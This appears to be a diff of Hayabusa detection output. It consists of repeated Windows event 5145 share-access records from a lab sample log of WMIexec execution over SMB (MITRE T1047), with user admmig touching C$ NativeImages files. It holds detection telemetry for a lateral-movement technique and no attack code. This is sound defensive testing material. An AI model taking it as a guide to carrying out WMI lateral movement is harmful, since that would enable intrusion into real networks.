+2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
